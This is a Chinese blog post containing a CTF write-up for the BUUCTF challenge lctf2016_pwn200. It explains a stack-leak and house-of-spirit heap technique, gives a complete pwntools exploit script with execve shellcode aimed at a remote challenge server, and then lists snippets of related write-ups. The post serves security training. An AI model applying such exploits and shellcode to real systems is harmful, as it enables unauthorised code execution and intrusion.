buu lctf2016_pwn200

最新推荐文章于 2023-10-19 23:01:10 发布
最新推荐文章于 2023-10-19 23:01:10 发布
阅读量308 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51474381/article/details/116133034
版权

代码分析

1.可泄露rbp(就是泄露栈地址,因为没有\x00截断时会连带输出后面的数据)。 

2.buf可覆盖ptr(栈上变量覆盖),strcpy()可能会破坏我们构造好的payload,但是strcpy()并不会复制"\x00",所以在shellcode最前面要加上"\x00",这样就只有溢出,没有复制

3.后面就是堆的操作了,只有add和delete

总体思路

1.泄露rbp,获得栈地址。

2.写入shellcode+伪造size+覆盖dest,从而控制ptr。

3.free掉ptr指向的栈上的地址。

4.add回来,顺便改写返回地址,退出。

详细过程

与上面的思路相对应:

1.泄露rbp,获得栈地址。

2.写入shellcode+伪造size+覆盖dest,从而控制ptr。

3.free掉ptr指向的栈上的地址。

4.add回来,顺便改写返回地址,退出。

exp如下:

from pwn import *
context.log_level='debug'
#p=process('./pwn200')
p=remote('node3.buuoj.cn',29698)
libc=ELF('/home/root2/Desktop/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')

 

p.sendafter('who are u?','a'*0x30)
p.recvuntil('a'*0x30)
addr=u64(p.recv(6).ljust(8,"\x00"))
success('addr:'+hex(addr))

shellcode = "\x00\x31\xf6\x48\xbb\x2f\x62\x69\x6e"
shellcode += "\x2f\x2f\x73\x68\x56\x53\x54\x5f"
shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05"
payload = (shellcode+p64(0)*2+p64(0x41)).ljust(0x38,'\x90')
payload = payload+p64(addr-0x90)
p.recvuntil('give me your id ~~?\n')
p.sendline('31')
p.recvuntil('give me money~\n')
p.sendline(payload)
p.recvuntil('your choice : ')
p.sendline('2')

p.recvuntil('your choice : ')
p.sendline('1')
p.recvuntil('how long?\n')
p.sendline('48')
p.recvuntil('48\n')
p.sendline('b'*0x18+p64(addr+0x40-0x100+1))

p.interactive()

 

注意:

为了字节对齐,shellcode多加了一个\x00,所以最后返回地址要加一。

 

NN小弟
关注
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
[BUUCTF-pwn]——lctf2016_pwn200
Y_peak的博客
03-11 660
[BUUCTF-pwn]——lctf2016_pwn200 题目地址:https://buuoj.cn/challenges#lctf2016_pwn200 还是先chekcsec 一下, 没有开启NX代表我们可以手写shellcode并且执行 在IDA, 中大家自己看看就好,我这里将两个漏洞的位置告诉大家就好 寻找偏移 思路 利用漏洞1, 获得main_ebp地址, 寻找到我们写入的shellcode距离的位置 利用漏洞2 覆盖dest变量值为free的got表的地址, 这样通过strcpy
BUUCTF--lctf2016_pwn200
qq_73149934的博客
04-01 305
free(ptr)后再malloc(0x30),得到这块fake_chunk的控制权,接着将返回地址(get_money_ret)覆盖为shellcode_addr,退出拿到shell。向$buf输入,构造fake_chunk且覆盖dest(ptr)的size,同时修改ptr指向fake_chunk的mem部分。这里得到的是rbp中的值,不是rbp地址,通过调试得到偏移。3.利用”give me money~“,布置。5.修改返回地址为shellcode的地址。是一个入住宾馆的题目。
lctf2016_pwn200 堆利用
人饭子的博客
12-31 535
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
lctf2016_pwn200
z1r0的博客
02-22 2767
lctf2016_pwn200 查看保护 这里有一个漏洞,read的时候可以泄露栈上的地址,因为没有\x00来截断。 这里会将buf的东西给复制到dest这里。然后ptr全局变量为dest。 这个函数就是一个add和delete的堆功能。 攻击思路:可以将shellcode写入第一次输入的地方,再借助这里输出ebp地址,然后算出shellcode_addr。到了strcpy这里的话可以使用\x00来截断复制功能然后填满buf,接着劫持free_got为shellcode_addr(free_got)
[pwn][堆利用]house of spirit[例题:lctf2016_pwn200]
zhulintintao的博客
11-21 853
House of spirit 实现目的 malloc分配到目标地址 实现条件 free的参数可控 目标地址可以连续构造两个fake chunk的size域,需要地址对齐(即目标高低地址处均有可控区域) 实现方法 在目标地址伪造可以被释放到fastbin上的fake chunk 伪造fake chunk的同时伪造好其下一个chunk(物理上的)的size域 将目标地址作为参数free malloc一次,将返回指向目标地址的指针 实现实例 题目平台 buuctf 题目名
cipher_CIPHER_
09-29
标题中的"Cipher_CIPHER_"可能指的是密码学中的加密算法或安全协议,这在IT行业中是非常重要的一环,特别是在数据传输、网络安全以及信息安全存储等领域。"Hi3520D"则可能是一个芯片型号,通常用于处理视频编码、...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
thuong_mai_dien_tu_magento
03-05
Docker Magento 2.4.X开源(CE)02-2021 用于Magento 2.4.x开发的Docker容器,包括: ... 阿帕奇2.4 MYSQL 8 清漆6 FPC 兔子MQ PhpMyAdmin 记忆快取 弹性搜寻7.x REDIS会话,系统,FPC ... 编辑.env-添加您的...
Linux pwn入门教程(7)——PIE与bypass思路
子曰小玖的博客
06-04 2217
https://bbs.ichunqiu.com/thread-43627-1-1.html 0x00 PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position...
LCTF 2016:pwn200 解法1
weixin_39678876的博客
10-19 100
还可通过house-of-spirit,在stack上构造fake chunk的方法,但思路大同小异。都是执行shellcode来获取shell。经计算,shellcode长度正好小于0x30,可通过修改返回地址为stack上,执行shellcode代码,获取shell。存在数组越界漏洞,结合strcpy可造成一个地址的任意地址写。存在off-by-on漏洞,可泄露stack地址。查看反汇编,发现可利用漏洞代码。
堆(heap)及内存泄露
baymaxly的博客
02-01 871
一、堆内存特点 操作系统堆管理器管理:堆管理器是操作系统的一个模块,堆管理内存分配灵活,按需分配 大块内存:堆内存管理着总量很大的操作系统内存块,各进程可以按需申请使用,使用完释放 手动申请、释放:需要写代码去malloc及free 脏内存:堆内存也是反复使用的,而且使用者用完释放前不会清除,因此也是脏的 临时性:堆内存只在malloc和free之间属于某个进程,可以访问。在malloc之间个...
攻防世界pwn——pwn-200
qq_62076255的博客
12-23 468
做题记录
lctf2016_pwn200【write up】
m0_73756460的博客
04-14 134
buu刷题 lctf2016_pwn200【write up】
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1698
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
Lctf-2016-pwn100 题解
lifanxin的博客
12-24 856
Write Up知识点和关键字样本运行静态分析程序逻辑求解脚本 知识点和关键字 栈溢出 ROP 无libc泄露函数地址 样本 来自Lctf 2016年的pwn题,样本 pwn100 (这个资源没办法上传,想要样本的可以留言!) 运行 查看文件属性   64位程序,只开了NX保护 运行样本程序 输入超过200个字符串才会回显"bye~",接着报了一个段错误,程序结束 静态分析 把程序拖进到IDA查看,发现main函数比较简单,主要起作用的是sub_40068E()函数,我们直接进入到这个函数。 该函数又
buu cipher
最新发布
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值